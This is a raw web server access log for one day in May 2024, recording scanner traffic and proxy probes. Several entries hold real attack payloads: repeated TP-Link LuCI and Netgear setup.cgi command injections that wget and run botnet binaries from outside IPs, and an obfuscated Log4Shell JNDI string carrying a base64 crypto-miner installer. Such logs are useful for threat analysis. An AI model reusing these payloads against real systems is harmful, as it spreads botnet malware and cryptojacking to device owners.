87.121.69.25 - - [11/May/2024:00:03:35 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 206.168.32.3 - - [11/May/2024:00:36:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:00:36:08 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:00:36:08 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.52 - - [11/May/2024:01:31:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [11/May/2024:01:35:06 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:02:16:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 64.62.156.28 - - [11/May/2024:02:56:06 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.24 - - [11/May/2024:02:56:31 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.27 - - [11/May/2024:02:56:50 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.34 - - [11/May/2024:02:57:02 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [11/May/2024:03:44:25 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:04:17:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 139.59.62.196 - - [11/May/2024:04:19:45 +0200] "-" 400 1930 139.59.62.196 - - [11/May/2024:04:19:45 +0200] "-" 400 1930 139.59.62.196 - - [11/May/2024:04:19:46 +0200] "GET /157.90.17.105 HTTP/1.1" 400 771 198.12.65.238 - - [11/May/2024:04:31:22 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.63 - - [11/May/2024:04:40:34 +0200] "-" 400 1930 222.247.13.21 - - [11/May/2024:05:38:33 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 727 194.165.16.73 - - [11/May/2024:05:56:46 +0200] "-" 400 1930 172.212.61.48 - - [11/May/2024:06:06:33 +0200] "-" 400 1930 141.98.11.15 - - [11/May/2024:06:37:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:06:51:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.25 - - [11/May/2024:07:05:50 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 87.121.69.52 - - [11/May/2024:07:10:12 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.221.136.118 - - [11/May/2024:07:31:06 +0200] "GET / HTTP/1.1" 200 1895 91.92.245.67 - - [11/May/2024:07:50:12 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.121.69.25 - - [11/May/2024:08:59:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 206.217.128.98 - - [11/May/2024:09:13:30 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [11/May/2024:09:15:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 89.190.156.248 - - [11/May/2024:09:41:49 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [11/May/2024:10:01:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 195.1.144.107 - - [11/May/2024:10:05:28 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.122.204.179 - - [11/May/2024:10:21:35 +0200] "-" 400 1930 54.177.182.231 - - [11/May/2024:10:31:19 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.106 - - [11/May/2024:10:34:03 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.66 - - [11/May/2024:10:35:54 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 195.1.144.109 - - [11/May/2024:10:48:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 152.32.235.206 - - [11/May/2024:10:49:29 +0200] "-" 400 1930 152.32.235.206 - - [11/May/2024:10:49:39 +0200] "GET / HTTP/1.1" 200 1895 152.32.235.206 - - [11/May/2024:10:49:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.235.206 - - [11/May/2024:10:49:58 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.235.206 - - [11/May/2024:10:49:58 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 141.98.11.15 - - [11/May/2024:11:16:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:11:48:51 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F173.44.139.198%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 89.169.20.107 - - [11/May/2024:12:04:26 +0200] "GET /playlist.m3u8 HTTP/1.1" 404 731 89.169.20.107 - - [11/May/2024:12:04:27 +0200] "GET /playlist.m3u8 HTTP/1.1" 404 731 206.168.32.3 - - [11/May/2024:12:06:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:12:06:30 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:12:06:30 +0200] "GET /favicon.ico HTTP/1.1" 404 729 35.88.249.36 - - [11/May/2024:12:18:20 +0200] "GET / HTTP/1.1" 200 1895 95.214.55.144 - - [11/May/2024:12:19:48 +0200] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//95.214.55.202:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 1217 172.105.77.209 - - [11/May/2024:12:46:15 +0200] "-" 400 1930 78.108.177.50 - - [11/May/2024:13:11:48 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.52 - - [11/May/2024:13:31:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [11/May/2024:13:33:47 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 137.184.20.196 - - [11/May/2024:14:07:59 +0200] "-" 400 1930 137.184.20.196 - - [11/May/2024:14:07:59 +0200] "-" 400 1930 137.184.20.196 - - [11/May/2024:14:08:00 +0200] "GET / HTTP/1.1" 200 1895 137.184.20.196 - - [11/May/2024:14:08:00 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 137.184.20.196 - - [11/May/2024:14:08:00 +0200] "-" 400 1930 80.76.49.131 - - [11/May/2024:14:20:01 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 206.168.32.3 - - [11/May/2024:15:00:15 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:15:00:19 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [11/May/2024:15:00:19 +0200] "GET /favicon.ico HTTP/1.1" 404 729 207.167.67.154 - - [11/May/2024:15:03:56 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 141.98.11.179 - - [11/May/2024:15:20:15 +0200] "CONNECT www.bing.com:443 HTTP/1.1" 400 804 179.43.188.106 - - [11/May/2024:15:24:42 +0200] "GET / HTTP/1.1" 200 1895 92.118.57.249 - - [11/May/2024:15:33:10 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 45.171.57.0 - - [11/May/2024:15:52:22 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.50 - - [11/May/2024:16:21:50 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.70 - - [11/May/2024:16:44:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 117.247.210.93 - - [11/May/2024:16:48:42 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [11/May/2024:17:08:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 103.109.37.37 - - [11/May/2024:17:37:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [11/May/2024:18:02:56 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 155.133.23.58 - - [11/May/2024:18:16:23 +0200] "GET / HTTP/1.0" 200 1895 194.59.31.163 - - [11/May/2024:18:22:37 +0200] "GET / HTTP/1.1" 200 1895 183.81.169.139 - - [11/May/2024:18:30:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 185.191.126.213 - - [11/May/2024:18:41:33 +0200] "GET / HTTP/1.1" 200 1895 179.43.188.106 - - [11/May/2024:18:45:32 +0200] "GET / HTTP/1.1" 200 1895 157.119.249.159 - - [11/May/2024:19:22:50 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 87.121.69.52 - - [11/May/2024:19:26:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.105 - - [11/May/2024:19:54:10 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:20:50:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756 195.1.144.109 - - [11/May/2024:21:03:13 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 162.243.141.21 - - [11/May/2024:21:05:36 +0200] "-" 400 1930 35.203.210.158 - - [11/May/2024:22:02:28 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [11/May/2024:22:24:59 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.76.49.132 - - [11/May/2024:22:44:34 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 185.216.71.4 - - [11/May/2024:22:48:38 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 400 804 185.216.71.4 - - [11/May/2024:22:48:38 +0200] "-" 400 1930 192.241.231.32 - - [11/May/2024:23:00:48 +0200] "GET / HTTP/1.1" 200 1895 207.167.67.66 - - [11/May/2024:23:19:39 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 183.81.169.139 - - [11/May/2024:23:56:31 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sshdbot%3B+wget+http%3A%2F%2F146.196.67.240%2Fshk+-O+sshdbot%3B+chmod+777+sshdbot%3B+.%2Fsshdbot+tplink%3B+rm+-rf+sshdbot%60) HTTP/1.1" 404 756